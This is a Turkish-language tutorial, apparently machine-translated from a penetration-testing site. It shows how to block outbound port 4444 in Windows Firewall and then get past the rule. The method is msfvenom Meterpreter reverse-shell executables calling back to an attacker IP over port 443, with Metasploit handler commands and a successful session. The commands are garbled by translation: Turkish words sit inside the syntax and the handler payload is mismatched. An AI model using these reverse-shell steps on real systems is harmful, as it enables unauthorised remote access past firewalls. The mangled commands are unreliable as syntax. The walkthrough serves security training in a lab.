Önceki güvenlik duvarı sızma testi makalelerinde, bilgisayar korsanlarının veya kötü amaçlı yazılımların bilgisayarınıza saldırmasını önlemek için ağdaki herhangi bir belirli bağlantı noktasına erişimi engellemek için bir güvenlik duvarının nasıl kullanılacağını okumuş olabilirsiniz. Bu makalenin amacı, bir saldırganın güvenlik duvarı kurallarını nasıl aşabileceğini ve kurbanın bilgisayarına yetkisiz erişime nasıl teşebbüs edebileceğini açıklamaktır.
Hedef: Windows PC
Saldırgan: Kali Linux
Hadi başlayalım! !
Güvenlik duvarı ayarlarına girmek için kontrol panelini açın ve ardından ekran görüntüsünde gösterildiği gibi güvenlik duvarı kurallarını yapılandırmak için gelişmiş ayarları seçin.
Saldırılara karşı koruma sağlamak için ağa bir güvenlik katmanı eklemek üzere güvenlik duvarına yeni kurallar yapılandırmak için Giden Kuralları'na gidin.
Oluşturulacak güvenlik duvarı kuralı türünü seçin, TCP ve UDP bağlantı noktası bağlantılarının seçeneklerini kontrol etmek için Bağlantı Noktası düğmesine ve ardından İleri'ye tıklayın.
Şimdi kuralın uygulanacağı protokolü ve bağlantı noktasını belirtin.TC'yi seçtim, ardından bu kuralın uygulanacağı bağlantı noktasını 4444 olarak belirledikten sonra İleri'ye tıklayın.
Bağlantı koşulları belirlediğim belirtilen koşullarla eşleştiğinde, bağlantıyı engellemeyi seçin.
Bu kuralı tüm senaryolara uygulamak için tüm onay kutularını seçin.
Kuralınızı burada adlandırın. Ekran görüntüsünde ona 4444 numaralı bağlantı noktasını bloke ettiğimi görebilir ve ardından Bitir'i tıklayabilirsiniz.
Burada, yeni giden kuralının giden kural listesine eklendiğini görebilirsiniz. Artık bu bilgisayar 4444 numaralı bağlantı noktasıyla bağlantı kurmak için herhangi bir saldırıya karşı savunma yapabilir, çünkü saldırganın 4444 numaralı bağlantı noktası üzerinden bağlantı kurmak için yaptığı tüm işlemler reddedilecektir.
Artık saldırgan 4444 numaralı bağlantı noktası üzerinden kötü amaçlı dosyalar gönderdiğinde giden kurallarımızın etkili olup olmadığını görmeye çalışıyoruz.
Burada msfvenom'u 4444.exe adlı exe formatında bir dosya oluşturmak için kullanıyorum ve ardından kurbana gönderiyorum ve arka planda başlatıyorum
msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.1.102 lport = 4444 -f exe > /root/Desktop/4444.exeKurbanın bilgisayarıyla bağlantı kurup kurmadığınızı görmek için
çoklu / işleyici kullan msf exploit (işleyici) > payload / meterpreter / reverse_tcp ayarla msf exploit (işleyici) > lhost 192.168.1.102 ayarla msf exploit (işleyici) > set lport 4444 msf exploit (işleyici) > istismar etmekOOPS !! Yanıt yok
Bu, mağdur ile saldırgan arasında bir bağlantı kuramayacağımız anlamına gelir. Artık kurbanın 4444 numaralı bağlantı noktasındaki bağlantıyı başarıyla reddettiğini biliyoruz.
Bu tür bir kısıtlama ile karşılaştığınızda, saldırının amacı konusunda net olmalısınız? Kurbanın bilgisayarına saldırmanız ve bir bağlantı kurmanız gerekir.
Kötü amaçlı dosyalarınızı 80/443/445 gibi sık açık bağlantı noktaları üzerinden göndermeyi deneyebilirsiniz.
Bir saldırgan 443 numaralı bağlantı noktasını kullanarak kötü amaçlı bir dosya göndermeye çalıştığında, saldırgan kurbanın bilgisayarıyla bağlantı kurabilir mi?
msfvenom -p windows / meterpreter / reverse_https lhost = 192.168.1.102 lport = 443 -f exe > /root/Desktop/443.exe443.exe'yi 443 numaralı bağlantı noktası üzerinden gönderin
çoklu / işleyici kullan msf exploit (işleyici) > yük pencerelerini ayarla / meterpreter / reverse_http msf exploit (işleyici) > lhost 192.168.1.102 ayarla msf exploit (işleyici) > lport 443 ayarla msf exploit (işleyici) > sömürmekHARİKA!! Başarılı saldırı
Metasploit'i kurbanın bilgisayarının ölçüm cihazı oturumunu elde etmek için başarıyla kullandık
Özetle, saldırının başarısızlığı, diğer tarafın uyguladığı yama veya savunmasız bağlantı noktasına bağlantının engellenmesinden kaynaklanmayabilir.
* Kaynak: hackingarticles, MottoIN editörü tarafından derlenmiş ve yayınlanmıştır, lütfen MottoIN'den olduğunu belirtinOrijinal makale, yazar: Jarry, http: //www.mottoin.com/article/system/98694.html adresinden yeniden üretilmiştir.